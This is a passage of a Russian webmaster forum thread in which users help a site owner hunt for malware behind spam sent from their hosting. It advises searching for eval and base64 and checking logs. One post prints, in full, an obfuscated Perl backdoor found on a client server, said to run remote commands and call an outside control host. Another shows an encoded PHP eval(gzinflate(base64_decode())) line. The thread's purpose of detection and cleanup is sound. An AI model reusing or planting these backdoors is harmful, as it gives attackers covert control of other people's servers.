Быстрый переход |
|
Начинающему веб-мастеру Инструкции, часто задаваемые вопросы и программы обучения. |
|
Опции темы |
Сегодня | |||||
|
21.02.2017, 14:29 | #21 | |||
|
К проблеме подходите комплексно!
а так же выкачайте исходники себе на комп и прогоните поиском по всем файлам на наличие eval, base64(что это? погуглите) практически все шелы кодируются и по коду их легко найти на сервере. не будущее не размещайте сайты под одного юзера(root) и про chown и изоляцию в chroot еще почитай а то получится так что ищешь на ru а зараза сидит в РФ ) не так всё просто и я помню, когда меня в первый раз ломали... Почитай вот это Основы програмирования для жадных Учавствовал в складчине здесь - Может быть поможет! |
|||
25.02.2017, 00:55 | #22 | |||
Реноме:
1908
|
Когда некоторое время тому назад вел небольшой хостинг было дело, пришлось попотеть пока нашёл бяку... К одним клиентам через FTP закачали небольшие закодированные перловские файлики, через которые извне запускали скрипты на хостинге. Причём отследить запуск было сложно ибо
1) параметры передавались через cookie обычным get-запросом. 2) через этот скрипт закачивали другой монстровый скрипт и запускали его в фоновом режиме. А там уже этот скрипт конектился на внешний сервер и оттуда координировался. В конце скрипт самоудалялся. Всё было круто. Поэтому по логам хостов было сложно связать все эти события и найти откуда ноги растут. ТС, у Вас есть время рассылок. Соберите все логи и посмотрите, что запускалось в это время (+/-). Возможно найдёте виновника рассылки. И так просканируйте скрипты на подозрительные включения base64 и пр. добавлено через 7 минут Кстати вот тот маленький перловский файлик. Забавно выглядит Код:
#!/usr/bin/perl $??s:;s:s;;$?::s;(.*); ]="&\%[=.*.,-))'-,-#-*.).<.'.+-<-~-#,~-.-,.+,~-{-,.<'`.{'`'<-<--):)++,+#,-.{).+,,~+{+,,<)..})<.{.)-,.+.,.)-#):)++,+#,-.{).+,,~+{+,,<)..})<*{.}'`'<-<--):)++,+#,-.{).+:,+,+,',~+*+~+~+{+<+,)..})<'`'<.{'`'<'<-}.<)'+'.:*}.*.'-|-<.+):)~*{)~)|)++,+#,-.{).+:,+,+,',~+*+~+~+{+<+,)..})<*{'`'<'<---~.)-,-(-*-:)'-}.<)')+.:)'):+'.:)<'`'<'<.{'`'<'<'<-}.<)'):)+-{)|)+.-)<*}.*.'-|-<.+):)~*})~)|)+.:)<*{'`'<'<'<-<--):)+-{)'-#-,)').-{-,.<).)<.{-#-,.:.+*{.}'`'<'<'<.)-,.+.,.)-#):)+.-)<*{'`'<'<.}'`'<.}'`'<.)-,.+.,.)-#):.,-#-+-,--)<*{'`.}'`'`.*.,-))'-,-#-*.).<.'.+-<-~-#,~---(.*.+'`.{'`'<-}.<)'):)+..)|)+-{)<*}+',~*{'`'<-<--):)()+-{)<.{)+-{*})--,-#-*.).<.'.+-<-~-#,~-.-,.+,~-{-,.<):)<*{.}'`'<-<--):):)()+)+..)<.|.|):)()+-{)<.|.|):)(-|-,-#-..+-:):)+-{)<)<)<.{.)-,.+.,.)-#*{.}'`'<-}.<)')+-)*}).).*{'`'<-}.<)')+..-|*}-|-,-#-..+-:):)+)+..)<*{'`'<-}.<)')+-{-|*}-|-,-#-..+-:):)+-{)<*{'`'<-}.<)')+.)-|*})+..-|),)+-{-|*{'`'<-}.<)')+---|*})+..-|)})+.)-|*{'`'<-}.<)')+-)-**})+---|)~)+-{-|*{'`'<---~.)):-}.<)')+-~*}*'*{)+-~*|)+---|*{)+-~){*})+-{-|)<'`'<.{'`'<'<-}.<)')+.'*}.*.,-).*.+.)):)+)+..)|)+-~)|)+-{-|)<*{'`'<'<)+-))#*}.,-#.'-(-*-{):).-().)#)+-{-|)|)))+-{)))',#)')))+.')))<*{'`'<.}'`'<-<--):)+.)-|)<'`'<.{'`'<'<-}.<)')+.'*}.*.,-).*.+.)):)+)+..)|)+---|)|)+.)-|)<*{'`'<'<)+-))#*}.,-#.'-(-*-{):).-().)#)+.)-|)|)))+-{)))',#)')))+.')))<*{'`'<.}'`'<)+)+..*})+-)*{'`'<.,-#-+-,--)')+-)*{'`'<.)-,.+.,.)-#*{'`.}'`'`.*.,-))'-,-#-*.).<.'.+-<-~-#,~---(.*.+,~-)-|-~-*-{.*'`.{'`'<-}.<)'):)+..)|)+-{)<*}+',~*{'`'<-<--):)()+-{)<.{)+-{*})--,-#-*.).<.'.+-<-~-#,~-.-,.+,~-{-,.<):)<*{.}'`'<-<--):):)()+)+..)<.|.|):)()+-{)<.|.|):)(-|-,-#-..+-:):)+-{)<)<)<.{.)-,.+.,.)-#*{.}'`'<-}.<)')+-)*}).).*{'`'<-}.<)')+..-|*}-|-,-#-..+-:):)+)+..)<*{'`'<-}.<)')+-{-|*}-|-,-#-..+-:):)+-{)<*{'`'<-}.<)')+-)-|*}*:*(*<*)*'*{'`'<-}.<)')+.)-|*})+..-|),)+-)-|*{'`'<-}.<)')+---|*})+..-|)})+.)-|*{'`'<-}.<)')+-)-**})+---|)~)+-)-|*{'`'<-}.<)')+.+-{*})+-{*{'`'<---~.)):-}.<)')+-~*}*'*{)+-~*|)+---|*{)+-~){*})+-)-|)<'`'<.{'`'<'<-}.<)')+.'*}.*.,-).*.+.)):)+)+..)|)+-~)|)+-)-|)<*{'`'<'<)--,-#-*.).<.'.+-<-~-#,~---(.*.+):,|)+.')|)+.+-{)<*{'`'<'<)+-))#*})+.'*{'`'<'<)+.+-{*}.*.,-).*.+.)):)+.+-{)|)+-)-|),)+-{-|)|)+-{-|)}):)+-)-|),)+-{-|)<)<)#.*.,-).*.+.)):)+.+-{)|*')|)+-)-|),)+-{-|)<*{'`'<.}'`'<-<--):)+.)-|)<'`'<.{'`'<'<-}.<)')+.'*}.*.,-).*.+.)):)+)+..)|)+---|)|)+.)-|)<*{'`'<'<)--,-#-*.).<.'.+-<-~-#,~---(.*.+):,|)+.')|)+.+-{)<*{'`'<'<)+-))#*})+.'*{'`'<.}'`'<)+)+..*})+-)*{'`'<.,-#-+-,--)')+-)*{'`'<.)-,.+.,.)-#*{'`.}'`'`.*.,-))'-,,~-,-*.)'`.{'`'<-}.<)')+-*-~-+-,*}.*-:-<--.+*{'`'<)--,-#-*.).<.'.+-<-~-#,~---(.*.+,~-)-|-~-*-{.*):)+-*-~-+-,)<*{'`.}'`==]="&&[=|\\\@"\\#x"!([[=#\$=]="&\%[=!?=]##=^ ]="&\%[=.'+{-,)*(:*.(<('')*|.-(`*-(:)-,|-(*'+,(.+{)()}(:*`'<*#-}-(+~()+),-.,.#,(,<-'-#)`,-.+'}.:'<*{*.'.*|'#)~.#*:((.)*}*#'-.',(,<-'*<)*'<-,+,'.({*.){'|*-(#)<*#-(*#*|.{'-){.<+#*),.*<*#'))*+)+<-(,{*+(*.*+#*`-{(:)},~(+(~-<,*-**#(*-`.)(<.:+,(`')*+)},(,<-*).)~+{-(,`+~(:*`*''|).,(+',~'#**,.(#-(,{))-',`-*)-*<':)+,`,`+~'((')}):){'-'+)-*:(~+~(:).*{((*-())*))+*.+(~+<(--<,*-*,`'{)-*.(<):(#+.+)-<,*-*,`(~*<**+{(-,<((''*.)}+).`,(+',~-)*-,<((''*.)}+)''+--|','+)-,}(.(~-:-**`(,*,'*(:)#(((`,+*:*}*`'(*-(#.'-|*:'`.,*<*+'('}*:(-){'..`+*)),*'-({)'*-(#*|':***:'`):,*,`+|)-*`(`.++*-*'},<(:(~+<-(,{,''**,+))<*<',){,*(((~.`'`+-)*'{)<*}+*-)-,(|'`--)(,).++--|','+)-,}(.(~-:-*){(,*,'*(:)#(((`,-({.#)<'{*''(-).():.(((,#(:))*,'*).+)-}'`+,-)(`,-'`.{.'+--(+*-*.~-(+|*~'<-(,{,'-**)'-){)+'--}'-,{,',:,'-*,`':)**:'-)`,)(.+*'(.',(,<-*+*,~'))*(#(}({*.*.+)(,+--}-:+|-{()(#+).{,*-*,`-**(,|-)+|*~.{'<*{*.'.*|'#)~.#)}-|'}.:-),{,'-*)''~)+*)+*(-(`,')|(.'}+`.(++-#)++,-.(-*`*~'-'<+,-)++.`'`(<(<,:)#(<'#*.+:.~,`-*-}-(+|*~.{-)),*('**~'~-)*)'#)*,~(|'#*-.((:*-'<*|.#*:-<()('+.-*-<,:-.+-.`.~+)-*('(#'#*|*#(#*{+)-#*++)-|*|.{-),{,'((,<-*+*,~-)+|+-''')*|)}+`(,+`-#*+,'+~*~.{-),{)+-',`-*+*,~':)<,<'('#.`(~+*-:-'+*,~-)+|+-''')*|)}+`.(),'('`',-.'}.:-),{,'(.,<-*+*,~':)<,<'('#.`'`+*-:-'+*,~(-+~*~'~,',:)+-',<(`*:*~',*((-,'):*}*.(#*-'+*#.{*~*|+-(.,(.))}'~){(#-,)-'.)+,~(|*.*|','+.(,(+',|'-*|(-,-',-~.#*<*<)'(|*})#.*++(<*<'{**+}-:-').)~+{-(,,+~+|.,-)-'*#(*-`(-(*.:+,')'.*{)}+).|,(-,.`+~''.:)+('.,((*#'.*`(,(,)+'`.}*{)#.,)++*-:-')|*<(<)',.(('*.)*+(*.*+#*).-+*',+#,{-()<,*-**#(*-`.#+~)#(`,-(}.{-+(<)*'-)*))+*-`'{,}+..-)(+*-:-'+**~'}-}()(<+{*|*|+`..'+-*)}',)'+#'-,')~,*-*)+'))**`'#-}()'+,-)|.-*-.-+)((--+-.|,.,~'}'~'),`.#,*){.{'}(:(~,}'|)(*+'*.`-'+*)}-(+|*~,-':.|-+'<*{(:-)*#'#*}(#,-,`.{.',(,<-**.,|(-+~*|({'}.`.}'<.*'~*{.-+|*),#({':*`.<(<)-(`)~)+'})'+)(('*.)-:,+.*+,)#**(}-`,:'.'.*#.<,:-}+`-,*)'#**(<(|(#*#*,+`.,+|-`**':)},<,))+(<.#+*,<((+',~({*.,~(|(~.).{),(:*-)+.+,'+~+{.:'#*#)`'**,+)-#*,,-*{(<)|(:).)<'~)('|)~))':)}(-,`+,.<.'+`.{++-(.~+{-}(:,<+).).(++.:+*-#.<'|*-,{({+),:))-',`+|*<)*({)'++(+'#)-*`').{+#.{.`+~..(`,-,:.#.},#.`,(+'){-()',`'('#,:))-',`(<**),(~)',{,`+~*(.',(,<(.+'==]="&&[=|\\\@"\\#x"!([[=#\$=_#?#|\@">!?[=]="&\%[=!?=]##=^;;y; -"[%-.:<-@]-`{-}#~\$\\;{\$()*.0-9\;\\_rs}&a-h;;s;(.*);$_;see; Если найдете подобную бяку, значит Вам тоже "повезло".
__________________
Последний раз редактировалось pegs; 25.02.2017 в 01:04. Причина: Добавлено сообщение |
|||
28.02.2017, 09:52 | #23 | |||
Реноме:
1556
|
А какое расширение у перловских файлов?
__________________
|
|||
28.02.2017, 10:05 | #24 | |||
Реноме:
1908
|
На расширение не ориентируйтесь (.pl, .cgi...). Контент смотрите. Так же смотрите настройки Апача, включен запуск cgi скриптов или нет (если cgi Вам не нужно, то вообще лучше убирать cgi).
На php тоже может быть похожая галиматья через preg_replace Код:
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7X1re9s2z/Dn9VcwmjfZq+.......='\x29\x29\x29\x3B",".");
__________________
|
|||
01.03.2017, 09:50 | #25 | |||
|
Сборник PHP-бекдоров для ознакомления и поиска бяки
ещё в помощь декодер, если найдёшь что то подозрительное у себя The Online PHP Decoder |
|||
01.03.2017, 11:28 | #26 | |||
Реноме:
1908
|
Да их может быть немерено. Главное анализировать использование eval, preg_* (с eval флагом) и т.п., как и любые "шифровки" кода. Если что-то подобно нашлось - разбираться.
Если у ТС-а нет shell доступа, то посоветовал бы выгрузить всё (!) на локальный диск и там уже искать, сравнивать и разбираться.
__________________
|
|||
25.04.2017, 22:13 | #27 | |||
Реноме:
1556
|
Короче, спамом похоже оказались уведомления о регистрации новых пользователей. Шли на старую почту и я их не видел. Какая-то хрень в автомате регистрировала пользователей и стопорила всю почту с хостинга. Теперь никто не может зарегистрироваться, да и не нужно.
__________________
|
|||
25.04.2017, 22:18 | #28 | |||
Реноме:
1908
|
Обычно капча помогает.
__________________
|
|||
Реклама | |
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1) | |
|
|